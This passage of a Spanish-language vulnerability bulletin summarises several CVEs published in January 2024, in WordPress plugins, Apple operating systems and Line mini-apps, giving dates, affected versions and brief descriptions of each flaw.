    El complemento Import any XML or CSV File to WordPress anterior a 3.7.3 acepta todos los archivos zip y extrae automáticamente el archivo zip en un directorio de acceso público sin validar suficientemente el tipo de archivo extraído. Esto puede permitir a los usuarios con privilegios elevados, como el administrador, cargar un tipo de archivo ejecutable que conduzca a la ejecución remota de código.
  • Vulnerabilidad en EventON-RSVP de WordPress (CVE-2023-7170)
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/01/2024
    Fecha de última actualización: 26/01/2024
    El complemento EventON-RSVP de WordPress anterior a 2.9.5 no sanitiza ni escapa algunos parámetros antes de devolverlos a la página, lo que genera Cross-Site Scripting Reflejado que podría usarse contra usuarios con altos privilegios, como administradores.
  • Vulnerabilidad en tvOS, watchOS, macOS Sonoma, iOS, iPadOS y macOS Ventura (CVE-2023-40528)
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/01/2024
    Fecha de última actualización: 26/01/2024
    Este problema se solucionó eliminando el código vulnerable. Este problema se solucionó en tvOS 17, watchOS 10, macOS Sonoma 14, iOS 17 y iPadOS 17, macOS Ventura 13.6.4. Es posible que una aplicación pueda eludir las preferencias de privacidad.
  • Vulnerabilidad en macOS Sonoma (CVE-2023-42881)
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/01/2024
    Fecha de última actualización: 26/01/2024
    El problema se solucionó mejorando el manejo de la memoria. Este problema se solucionó en macOS Sonoma 14.2. El procesamiento de un archivo puede provocar la finalización inesperada de la aplicación o la ejecución de código arbitrario.
  • Vulnerabilidad en macOS Ventura y macOS Sonoma (CVE-2023-42887)
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/01/2024
    Fecha de última actualización: 26/01/2024
    Se solucionó un problema de acceso con restricciones adicionales de la sandbox. Este problema se solucionó en macOS Ventura 13.6.4, macOS Sonoma 14.2. Es posible que una aplicación pueda leer archivos arbitrarios.
  • Vulnerabilidad en iOS, iPadOS, watchOS, macOS Ventura, macOS Sonoma y macOS Monterey (CVE-2023-42888)
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/01/2024
    Fecha de última actualización: 26/01/2024
    El problema se solucionó con controles mejorados. Este problema se solucionó en iOS 16.7.5 y iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 y iPadOS 17.2. El procesamiento de una imagen creada con fines malintencionados puede provocar la divulgación de la memoria del proceso.
  • Vulnerabilidad en macOS Sonoma, iOS y iPadOS (CVE-2024-23203)
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/01/2024
    Fecha de última actualización: 26/01/2024
    El problema se solucionó con comprobaciones de permisos adicionales. Este problema se solucionó en macOS Sonoma 14.3, iOS 17.3 y iPadOS 17.3. Un acceso directo puede utilizar datos confidenciales con determinadas acciones sin avisar al usuario.
  • Vulnerabilidad en macOS Sonoma, watchOS, iOS y iPadOS (CVE-2024-23204)
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/01/2024
    Fecha de última actualización: 26/01/2024
    El problema se solucionó con comprobaciones de permisos adicionales. Este problema se solucionó en macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 y iPadOS 17.3. Un acceso directo puede utilizar datos confidenciales con determinadas acciones sin avisar al usuario.
  • Vulnerabilidad en watchOS, tvOS, iOS, iPadOS, macOS Sonoma y Safari (CVE-2024-23206)
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/01/2024
    Fecha de última actualización: 26/01/2024
    Se solucionó un problema de acceso mejorando las restricciones de acceso. Este problema se solucionó en watchOS 10.3, tvOS 17.3, iOS 17.3 y iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 y iPadOS 16.7.5, Safari 17.3. Una página web creada con fines malintencionados puede tomar huellas digitales del usuario.
  • Vulnerabilidad en watchOS, iOS, iPadOS, macOS Sonoma, macOS Ventura y macOS Monterey (CVE-2024-23207)
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/01/2024
    Fecha de última actualización: 26/01/2024
    Este problema se solucionó mejorando la redacción de información confidencial. Este problema se solucionó en watchOS 10.3, iOS 17.3 y iPadOS 17.3, macOS Sonoma 14.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. Es posible que una aplicación pueda acceder a datos confidenciales del usuario.
  • Vulnerabilidad en macOS Sonoma (CVE-2024-23209)
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/01/2024
    Fecha de última actualización: 26/01/2024
    El problema se solucionó mejorando el manejo de la memoria. Este problema se solucionó en macOS Sonoma 14.3. El procesamiento de contenido web puede dar lugar a la ejecución de código arbitrario.
  • Vulnerabilidad en Line v13.6.1 (CVE-2023-43998)
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/01/2024
    Fecha de última actualización: 26/01/2024
    Un problema en la mini-app Books-futaba en Line v13.6.1 permite a los atacantes enviar notificaciones maliciosas manipuladas mediante la fuga del token de acceso al canal.
  • Vulnerabilidad en Line v13.6.1 (CVE-2023-43999)
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/01/2024
    Fecha de última actualización: 26/01/2024
    Un problema en la mini-app COLORFUL_laundry en Line v13.6.1 permite a los atacantes enviar notificaciones maliciosas manipuladas mediante la fuga del token de acceso al canal.
  • Vulnerabilidad en Line v13.6.1 (CVE-2023-44001)
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/01/2024
    Fecha de última actualización: 26/01/2024
    Un problema en la mini-app de la clínica Ailand en Line v13.6.1 permite a los atacantes enviar notificaciones maliciosas manipuladas mediante la fuga del token de acceso al canal.